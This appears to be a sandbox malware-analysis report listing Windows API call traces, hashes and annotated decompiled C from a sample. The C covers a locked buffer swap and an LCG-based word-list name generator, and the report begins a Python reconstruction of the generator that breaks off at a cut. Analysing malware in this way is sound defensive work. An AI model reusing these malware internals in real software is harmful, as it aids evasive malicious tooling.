                              • lstrcpy.KERNEL32(00000000), ref: 053E2056
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                              • String ID: \Low
                              • API String ID: 1629304206-4112222293
                              • Opcode ID: 2a7228ee2f9ee9fcf89826465212850bfd548df5ec32c37ced88517c0a2c0e99
                              • Instruction ID: 0882f38e3c9028dadc5e182464af48ef33346ec1b6acda423ab86244a7638cf3
                              • Instruction Fuzzy Hash: 69018032211524ABD6326B65AC4EFAB7BDCAF05751F010525F512EE0C0DF64DD01C6B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • FileTimeToLocalFileTime.KERNEL32(00000000,053C57F0), ref: 053DDCCD
                              • FileTimeToSystemTime.KERNEL32(053C57F0,?), ref: 053DDCDB
                              • lstrlenW.KERNEL32(00000010), ref: 053DDCEB
                              • lstrlenW.KERNEL32(00000218), ref: 053DDCF7
                              • FileTimeToLocalFileTime.KERNEL32(00000008,053C57F0), ref: 053DDDE4
                              • FileTimeToSystemTime.KERNEL32(053C57F0,?), ref: 053DDDF2
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                              • String ID:
                              • API String ID: 1122361434-0
                              • Opcode ID: b56b6ee8278ce744ca75c9a2ae5f0f9e811833d4fc4904d26c584eea863af09f
                              • Instruction ID: 33a5f51fa7ac9836b858f05b2b7c089641e1d52ebdf56fd5032702c0d6749ca5
                              • Instruction Fuzzy Hash: 6171EDB2A00219ABCB51DFA9D884AEEB7FCBF08304F144566F545E7241EB74EA45CB70
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053D34A4: lstrlen.KERNEL32(053CEFEF,747DF560,00000000,?,00000000,053DBF21,?,00000000,?,?,053CEFEF,00000020), ref: 053D34B3
                                • Part of subcall function 053D34A4: mbstowcs.NTDLL ref: 053D34CF
                              • lstrlenW.KERNEL32(00000000,?), ref: 053C17D2
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(?,00000000,747869A0,?,00000250,?,00000000), ref: 053DF68B
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(?,?,00000000), ref: 053DF697
                                • Part of subcall function 053DF63F: memset.NTDLL ref: 053DF6DF
                                • Part of subcall function 053DF63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 053DF6FA
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(0000002C), ref: 053DF732
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(?), ref: 053DF73A
                                • Part of subcall function 053DF63F: memset.NTDLL ref: 053DF75D
                                • Part of subcall function 053DF63F: wcscpy.NTDLL ref: 053DF76F
                              • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 053C17F3
                              • lstrlenW.KERNEL32(?), ref: 053C181D
                                • Part of subcall function 053DF63F: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 053DF795
                                • Part of subcall function 053DF63F: RtlEnterCriticalSection.NTDLL(?), ref: 053DF7CA
                                • Part of subcall function 053DF63F: RtlLeaveCriticalSection.NTDLL(?), ref: 053DF7E6
                                • Part of subcall function 053DF63F: FindNextFileW.KERNEL32(?,00000000), ref: 053DF7FF
                                • Part of subcall function 053DF63F: WaitForSingleObject.KERNEL32(00000000), ref: 053DF811
                                • Part of subcall function 053DF63F: FindClose.KERNEL32(?), ref: 053DF826
                                • Part of subcall function 053DF63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 053DF83A
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(0000002C), ref: 053DF85C
                              • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 053C183A
                              • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 053C1851
                              • PathFindFileNameW.SHLWAPI(0000001E), ref: 053C1866
                                • Part of subcall function 053CC627: lstrlenW.KERNEL32(?,?,00000002,00000000,?,?,?,053C187D,?,0000001E,?), ref: 053CC63C
                                • Part of subcall function 053CC627: lstrlenW.KERNEL32(?,?,?,?,053C187D,?,0000001E,?), ref: 053CC644
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                              • String ID:
                              • API String ID: 2670873185-0
                              • Opcode ID: 8f06006ee6d81c8b7d6d2902a692af13f47e9fd9077d1c6f5ea75f46472c428c
                              • Instruction ID: d120dbee45f51c40b7ea404282b3f6fa9b2ff3dc7b90496931ecbfeadcf7eaf7
                              • Instruction Fuzzy Hash: 26315972508305AFC711DF64D88886EBFEEFB88254F000A6DF48597252DB35DD05DBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 053DD4D4
                              • CreateWaitableTimerA.KERNEL32(053F0244,00000003,?), ref: 053DD4F1
                              • GetLastError.KERNEL32(?,?,053C8C58,?), ref: 053DD502
                                • Part of subcall function 053E32FF: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3337
                                • Part of subcall function 053E32FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 053E334B
                                • Part of subcall function 053E32FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3365
                                • Part of subcall function 053E32FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,053C3136,?,?,?), ref: 053E338F
                              • GetSystemTimeAsFileTime.KERNEL32(?,00000000,053C8C58,?,?,?,053C8C58,?), ref: 053DD542
                              • SetWaitableTimer.KERNEL32(?,053C8C58,00000000,00000000,00000000,00000000,?,?,053C8C58,?), ref: 053DD561
                              • HeapFree.KERNEL32(00000000,053C8C58,00000000,053C8C58,?,?,?,053C8C58,?), ref: 053DD577
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                              • String ID:
                              • API String ID: 1835239314-0
                              • Opcode ID: 5d7ac3da5725298cc8d7899b4768705c2e1d85f85cd17c3ed75740a32fc8619b
                              • Instruction ID: 9be0ad0874b17d4f9ea0fc2caf955a9ee95d95406850403090459e7cb4d79287
                              • Opcode Fuzzy Hash: 5d7ac3da5725298cc8d7899b4768705c2e1d85f85cd17c3ed75740a32fc8619b
                              • Instruction Fuzzy Hash: CC311AB2910109FBCB21EF95E989CAEFFBAFB84394F108415F506EA140D774AA40CB70
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?), ref: 053C55F2
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 053C5603
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000,?,?,?,?), ref: 053C561E
                              • GetLastError.KERNEL32(?,?,?,?), ref: 053C5634
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 053C5646
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 053C565B
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                              • String ID:
                              • API String ID: 1822509305-0
                              • Opcode ID: 10f5acb5b77fccfcc458783a330d21c477f7ebdc7a8bcce4ae63c3e4e2384211
                              • Instruction ID: bccfc37a7e63299bdd7d1ebb86d9e25df4c67a8b558c2f979aebaf69cb71c795
                              • Opcode Fuzzy Hash: 10f5acb5b77fccfcc458783a330d21c477f7ebdc7a8bcce4ae63c3e4e2384211
                              • Instruction Fuzzy Hash: 71116A76501128BBCF229A95DD0DCEFBFBEEF453A0F004061F505E9160DA719E61EBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 053C5CED
                              • _strupr.NTDLL ref: 053C5D28
                              • lstrlen.KERNEL32(00000000), ref: 053C5D30
                              • TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 053C5D6F
                              • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 053C5D76
                              • GetLastError.KERNEL32 ref: 053C5D7E
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                              • String ID:
                              • API String ID: 110452925-0
                              • Opcode ID: 44592580f4b1e60219a5f7152d153c92c8111380fa359f7b4b7c267ede0a5149
                              • Instruction ID: 47c5f24305f44ab9239680782d1e2dcfda5e46c9cb49f92bcb6b509827e30c12
                              • Opcode Fuzzy Hash: 44592580f4b1e60219a5f7152d153c92c8111380fa359f7b4b7c267ede0a5149
                              • Instruction Fuzzy Hash: 5511BFB6510204BFDB21ABB49C8DDAE7FADFB88751F100459F903DA084EEB4AC448B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • LoadLibraryA.KERNEL32(?,00000000,00000001,00000014,00000020,053DC64E,00000000,00000001), ref: 053DEF4D
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053DEF6C
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053DEF81
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053DEF97
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053DEFAD
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053DEFC3
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AddressProc$AllocateHeapLibraryLoad
                              • String ID:
                              • API String ID: 2486251641-0
                              • Opcode ID: dc18a2bfa21c69eaba37fd80e2f88c20357c56365b9483cd8307646e50bdfa61
                              • Instruction ID: 04e8bf261b0ec2a68dac255d1fc868519ed4304ddaf0d4c7b282c2470ceb36b4
                              • Opcode Fuzzy Hash: dc18a2bfa21c69eaba37fd80e2f88c20357c56365b9483cd8307646e50bdfa61
                              • Instruction Fuzzy Hash: 4A11FEB220021BAF9720DBADECD9D67BBECFB54744B161925B516CF141EB60E8018B70
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD62B
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD644
                              • GetCurrentThreadId.KERNEL32 ref: 053DD651
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5,?,?,?,?,?,053C43B5,00000000), ref: 053DD65D
                              • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD66B
                              • lstrcpy.KERNEL32(00000000), ref: 053DD68D
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 1175089793-0
                              • Opcode ID: 4c964061d4fa942b5ab44ee73153ab74d5ef095515dbd8c3f9910de89984a57a
                              • Instruction ID: 2a4a20764da6cdf76c0c098063528145acd709a3f0b063cdf7427d0c7839fde0
                              • Opcode Fuzzy Hash: 4c964061d4fa942b5ab44ee73153ab74d5ef095515dbd8c3f9910de89984a57a
                              • Instruction Fuzzy Hash: F1018473A101146BD7215BAAAC8DE6BBFBCFBC1B40B450425B90ADB140DEA1E9008BB0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ErrorLastmemset
                              • String ID: vids
                              • API String ID: 3276359510-3767230166
                              • Opcode ID: 77c551f34d9d95fed89b2310b250bfd9719342036e53d800cf8dc449b16d8d34
                              • Instruction ID: 1b9d3af3f473aa01560927f9636474b3519eeb9b1669310d8ba20b56a6d89791
                              • Opcode Fuzzy Hash: 77c551f34d9d95fed89b2310b250bfd9719342036e53d800cf8dc449b16d8d34
                              • Instruction Fuzzy Hash: F58118B2E102299FCF11DFA4D984AADBBB9FF08710F10856AF419EB250D7719A45CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053CDD78
                              • lstrlen.KERNEL32(?,?), ref: 053CDDA9
                              • memcpy.NTDLL(00000008,?,00000001), ref: 053CDDB8
                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 053CDE37
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreelstrlenmemcpy
                              • String ID: W
                              • API String ID: 379260646-655174618
                              • Opcode ID: 4d541d9eb14282b093b2dae705582337b8aea518d76683795deef4ce409a4609
                              • Instruction ID: 9f3bec7e85eabf2eb4429e7a4c68963790a702c4aec52f77e33283469b8508b6
                              • Opcode Fuzzy Hash: 4d541d9eb14282b093b2dae705582337b8aea518d76683795deef4ce409a4609
                              • Instruction Fuzzy Hash: 2441D8B0904286DBCB259F1CD88C7A5BFAAFF55344F40887EF4468B651D7709D45CB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 053E472A
                              • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 053E4791
                              • GetLastError.KERNEL32(?,00000000,00000000), ref: 053E479B
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: BuffersErrorFileFlushLastmemset
                              • String ID: K$P
                              • API String ID: 3817869962-420285281
                              • Opcode ID: 08fa0bc41a96b24f5b0b6c3006f9ab6d0a97e188abf0622378ef374f15d3cdf9
                              • Instruction ID: ac1ef5a499aa08631c90d4067f2d804a3a46ba697386f859c6c399a6d4b0f959
                              • Opcode Fuzzy Hash: 08fa0bc41a96b24f5b0b6c3006f9ab6d0a97e188abf0622378ef374f15d3cdf9
                              • Instruction Fuzzy Hash: 98417C71A00715DFDF25CFA4C984AAEBBF6BF09700F55492DD4A6D3A80E774A904CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memcpy.NTDLL(?,053E12DD,00000000,?,?,?,053E12DD,?,?,?,?,?), ref: 053C14B5
                              • lstrlen.KERNEL32(053E12DD,?,?,?,053E12DD,?,?,?,?,?), ref: 053C14D3
                              • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 053C1542
                              • lstrlen.KERNEL32(053E12DD,00000000,00000000,?,?,?,053E12DD,?,?,?,?,?), ref: 053C1563
                              • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 053C1577
                              • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 053C1580
                              • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 053C158E
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrlenmemcpy$FreeLocal
                              • String ID:
                              • API String ID: 1123625124-0
                              • Opcode ID: 19a4217fcfdde2c26c4f07cf97c1f085232f64a3d059da33f1e7370981fe4bcc
                              • Instruction ID: b427fd950b827b56f9390fd3ddaf9c8658834dd1f11aeb5dd447fe2712d0e8e5
                              • Opcode Fuzzy Hash: 19a4217fcfdde2c26c4f07cf97c1f085232f64a3d059da33f1e7370981fe4bcc
                              • Instruction Fuzzy Hash: A741057280021AABCF11DF68EC4589B7FA8FF043A4F05446AFD05A7251E671EE20DBE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 37%
                              			E049D4D70() {
                              				void* _v0;
                              				void** _t3;
                              				void** _t5;
                              				void** _t7;
                              				void** _t8;
                              				void* _t10;
                              
                              				_t3 =  *0x49dd35c; // 0x58195b0
                               				__imp__( &(_t3[0x10])); // RtlEnterCriticalSection (ref 049D4D79): the lock object lives inside the global at 0x49dd35c
                              				while(1) {
                              					_t5 =  *0x49dd35c; // 0x58195b0
                              					_t1 =  &(_t5[0x16]); // 0x0
                              					if( *_t1 == 0) {
                              						break;
                              					}
                               					Sleep(0xa); // spin-wait, 10 ms per iteration, until the flag at _t5[0x16] clears
                              				}
                              				_t7 =  *0x49dd35c; // 0x58195b0
                              				_t10 =  *_t7;
                               				if(_t10 != 0 && _t10 != 0x49de823) { // free the old buffer unless it is the built-in one at 0x49de823 (assumed static default)
                              					HeapFree( *0x49dd270, 0, _t10);
                              					_t7 =  *0x49dd35c; // 0x58195b0
                              				}
                              				 *_t7 = _v0;
                              				_t8 =  &(_t7[0x10]);
                               				__imp__(_t8); // RtlLeaveCriticalSection (ref 049D4DC6)
                              				return _t8;
                              			}
                              0x049d4d70
                              0x049d4d79
                              0x049d4d89
                              0x049d4d89
                              0x049d4d8e
                              0x049d4d93
                              0x00000000
                              0x00000000
                              0x049d4d83
                              0x049d4d83
                              0x049d4d95
                              0x049d4d9a
                              0x049d4d9e
                              0x049d4db1
                              0x049d4db7
                              0x049d4db7
                              0x049d4dc0
                              0x049d4dc2
                              0x049d4dc6
                              0x049d4dcc

                              APIs
                              • RtlEnterCriticalSection.NTDLL(05819570), ref: 049D4D79
                              • Sleep.KERNEL32(0000000A), ref: 049D4D83
                              • HeapFree.KERNEL32(00000000), ref: 049D4DB1
                              • RtlLeaveCriticalSection.NTDLL(05819570), ref: 049D4DC6
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                              • String ID: Uxt
                              • API String ID: 58946197-1536154274
                              • Opcode ID: 5d78bd229539f18865af50bce777f5e850431517fae87f1e304c59fc61846f64
                              • Instruction ID: 84bb856b90bb3eba0082094c56cdca388a6406ea01951587faf8741f0d147d76
                              • Opcode Fuzzy Hash: 5d78bd229539f18865af50bce777f5e850431517fae87f1e304c59fc61846f64
                              • Instruction Fuzzy Hash: C1F0FE7820A100EFEB189F68D949B257FB8EB14708B088139E902DB350D73CFC84DA11
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 22%
                              			E049DA90C(signed int __eax, signed int _a4, signed int _a8) {
                              				signed int _v8;
                              				signed int _v12;
                              				intOrPtr _v16;
                              				signed int _v20;
                              				intOrPtr _t81;
                              				char _t83;
                              				signed int _t90;
                              				signed int _t97;
                              				signed int _t99;
                              				char _t101;
                              				unsigned int _t102;
                              				intOrPtr _t103;
                              				char* _t107;
                              				signed int _t110;
                              				signed int _t113;
                              				signed int _t118;
                              				signed int _t122;
                              				intOrPtr _t124;
                              
                              				_t102 = _a8;
                              				_t118 = 0;
                              				_v20 = __eax;
                               				_t122 = (_t102 >> 2) + 1; // capacity of the word-pointer table: one slot per 4 input bytes
                              				_v8 = 0;
                              				_a8 = 0;
                               				_t81 = E049D55DC(_t122 << 2); // allocate the table (E049D55DC wraps RtlAllocateHeap)
                              				_v16 = _t81;
                              				if(_t81 == 0) {
                               					_push(8); // push 8 / pop eax: Win32 error 8, ERROR_NOT_ENOUGH_MEMORY
                              					_pop(0);
                              					L37:
                              					return 0;
                              				}
                              				_t107 = _a4;
                              				_a4 = _t102;
                              				_t113 = 0;
                              				while(1) {
                              					_t83 =  *_t107;
                              					if(_t83 == 0) {
                              						break;
                              					}
                               					if(_t83 == 0xd || _t83 == 0xa) { // CR or LF ends the current word
                              						if(_t118 != 0) {
                              							if(_t118 > _v8) {
                              								_v8 = _t118;
                              							}
                              							_a8 = _a8 + 1;
                              							_t118 = 0;
                              						}
                              						 *_t107 = 0;
                              						goto L16;
                              					} else {
                              						if(_t118 != 0) {
                              							L10:
                              							_t118 = _t118 + 1;
                              							L16:
                              							_t107 = _t107 + 1;
                              							_t15 =  &_a4;
                              							 *_t15 = _a4 - 1;
                              							if( *_t15 != 0) {
                              								continue;
                              							}
                              							break;
                              						}
                              						if(_t113 == _t122) {
                              							L21:
                               							if(_a8 <= 0x20) { // fewer than 33 words: fail
                               								_push(0xb); // Win32 error 11, ERROR_BAD_FORMAT
                              								L34:
                              								_pop(0);
                              								L35:
                              								E049D6DFA(_v16);
                              								goto L37;
                              							}
                              							_t24 = _v8 + 5; // 0xcdd8d2f8
                               							_t103 = E049D55DC((_v8 + _t24) * _a8 + 4); // output buffer: (2*maxlen + 5) bytes per name, _a8 names
                              							if(_t103 == 0) {
                              								_push(8);
                              								goto L34;
                              							}
                              							_t90 = _a8;
                              							_a4 = _a4 & 0x00000000;
                              							_v8 = _v8 & 0x00000000;
                              							_t124 = _t103 + _t90 * 4;
                              							if(_t90 <= 0) {
                              								L31:
                               								 *0x49dd2b0 = _t103; // publish the table of generated names in a global
                              								goto L35;
                              							}
                              							do {
                               								_t110 = 0x3c6ef35f + _v20 * 0x19660d; // LCG step 1: s1 = s*0x19660D + 0x3C6EF35F (selects the first word)
                               								_v20 = 0x3c6ef35f + _t110 * 0x19660d; // LCG step 2 (selects the second word); state carried in _v20
                               								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4))); // lstrcpy(dst, words[s1 % count]), ref 049DAA09
                               								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4))); // lstrcat(dst, words[s2 % count]), ref 049DAA1E
                              								_v12 = _v12 & 0x00000000;
                              								if(_a4 <= 0) {
                              									goto L30;
                              								} else {
                              									goto L26;
                              								}
                              								while(1) {
                              									L26:
                              									_t99 = _v12;
                               									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // lstrcmp(names[i], dst), ref 049DAA35: duplicate check
                              									if(_t99 == 0) {
                              										break;
                              									}
                              									_v12 = _v12 + 1;
                              									if(_v12 < _a4) {
                              										continue;
                              									}
                              									goto L30;
                              								}
                               								_v8 = _v8 - 1; // duplicate found: this iteration does not count toward the quota
                              								L30:
                              								_t97 = _a4;
                              								_a4 = _a4 + 1;
                              								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                               								__imp__(_t124); // lstrlen(dst), ref 049DAA59
                               								_v8 = _v8 + 1;
                               								_t124 = _t124 + _t97 + 1; // advance the write cursor past the NUL; _t97 here most likely stands for the lstrlen result (decompiler quality 22%)
                              							} while (_v8 < _a8);
                              							goto L31;
                              						}
                              						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                              						_t101 = _t83;
                               						if(_t83 - 0x61 <= 0x19) { // 'a'..'z' (intended as an unsigned range check)
                               							_t101 = _t101 - 0x20; // uppercase the first letter of the word
                              						}
                              						 *_t107 = _t101;
                              						_t113 = _t113 + 1;
                              						goto L10;
                              					}
                              				}
                              				if(_t118 != 0) {
                              					if(_t118 > _v8) {
                              						_v8 = _t118;
                              					}
                              					_a8 = _a8 + 1;
                              				}
                              				goto L21;
                              			}
                              0x049da913
                              0x049da91a
                              0x049da91f
                              0x049da922
                              0x049da929
                              0x049da92c
                              0x049da92f
                              0x049da936
                              0x049da939
                              0x049daa8d
                              0x049daa8f
                              0x049daa91
                              0x049daa96
                              0x049daa96
                              0x049da93f
                              0x049da942
                              0x049da945
                              0x049da947
                              0x049da947
                              0x049da94b
                              0x00000000
                              0x00000000
                              0x049da94f
                              0x049da97b
                              0x049da980
                              0x049da982
                              0x049da982
                              0x049da985
                              0x049da988
                              0x049da988
                              0x049da98a
                              0x00000000
                              0x049da955
                              0x049da957
                              0x049da976
                              0x049da976
                              0x049da98d
                              0x049da98d
                              0x049da98e
                              0x049da98e
                              0x049da991
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049da991
                              0x049da95b
                              0x049da9a2
                              0x049da9a6
                              0x049daa80
                              0x049daa82
                              0x049daa82
                              0x049daa83
                              0x049daa86
                              0x00000000
                              0x049daa86
                              0x049da9af
                              0x049da9c0
                              0x049da9c4
                              0x049daa7c
                              0x00000000
                              0x049daa7c
                              0x049da9ca
                              0x049da9cd
                              0x049da9d1
                              0x049da9d7
                              0x049da9da
                              0x049daa72
                              0x049daa72
                              0x00000000
                              0x049daa78
                              0x049da9e5
                              0x049da9ee
                              0x049daa02
                              0x049daa09
                              0x049daa1e
                              0x049daa24
                              0x049daa2c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049daa2e
                              0x049daa2e
                              0x049daa2e
                              0x049daa35
                              0x049daa3d
                              0x00000000
                              0x00000000
                              0x049daa3f
                              0x049daa48
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049daa4a
                              0x049daa4c
                              0x049daa4f
                              0x049daa4f
                              0x049daa52
                              0x049daa56
                              0x049daa59
                              0x049daa5f
                              0x049daa62
                              0x049daa69
                              0x00000000
                              0x049da9e5
                              0x049da960
                              0x049da96b
                              0x049da96e
                              0x049da970
                              0x049da970
                              0x049da973
                              0x049da975
                              0x00000000
                              0x049da975
                              0x049da94f
                              0x049da995
                              0x049da99a
                              0x049da99c
                              0x049da99c
                              0x049da99f
                              0x049da99f
                              0x00000000

                              APIs
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • lstrcpy.KERNEL32(69B25F45,00000020), ref: 049DAA09
                              • lstrcat.KERNEL32(69B25F45,00000020), ref: 049DAA1E
                              • lstrcmp.KERNEL32(00000000,69B25F45), ref: 049DAA35
                              • lstrlen.KERNEL32(69B25F45), ref: 049DAA59
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                              • String ID:
                              • API String ID: 3214092121-3916222277
                              • Opcode ID: 4ac99ebc9524c1a1c9159befd071197007b1058be183a365e3848936e93d269c
                              • Instruction ID: 1af76badd520b2399f2595eef08eaeea30cfd43bf7616835a76008274de07471
                              • Opcode Fuzzy Hash: 4ac99ebc9524c1a1c9159befd071197007b1058be183a365e3848936e93d269c
                              • Instruction Fuzzy Hash: 11518E31A00208EFDF21CF99C5846ADBBBAFF45314F16C16AE8599B215C770BA61CB90
                              Uniqueness

                              Uniqueness Score: -1.00%
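
                               Added example: the following Python reconstructs the word-list name generator decompiled above (E049DA90C) so that the algorithm can be reproduced offline. It is the editor's reading of the decompiled C, not code taken from the sample or produced by the sandbox. Taken directly from the decompilation: the CR/LF word split, uppercasing of each word's first letter, the requirement for more than 32 words, the per-word-table cap of (len >> 2) + 1 entries, and the two LCG steps per name with constants 0x19660D and 0x3C6EF35F. Assumed, because the decompilation quality is 22%: the LCG state is treated as unsigned for the modulus, and a name that lstrcmp-matches an earlier one is retried rather than stored. The sample word list is constructed for the example.

```python
# Added example: Python reconstruction of the name generator decompiled as
# E049DA90C. Not the sample's own code. Assumptions: unsigned modulus on the
# LCG state; a duplicate (lstrcmp match) is retried rather than stored.

MUL = 0x19660D          # multiplier seen at 0x049DA9EE
INC = 0x3C6EF35F        # increment seen at 0x049DA9EE
MASK = 0xFFFFFFFF       # 32-bit register arithmetic


def lcg_step(state):
    """One generator step: state' = state * 0x19660D + 0x3C6EF35F (mod 2**32)."""
    return (state * MUL + INC) & MASK


def parse_wordlist(buf):
    """Split a CR/LF-delimited byte buffer into words, uppercasing each word's
    first letter as the sample does (c -= 0x20 when 'a' <= c <= 'z').
    The sample caps the pointer table at (len(buf) >> 2) + 1 entries."""
    cap = (len(buf) >> 2) + 1
    words = []
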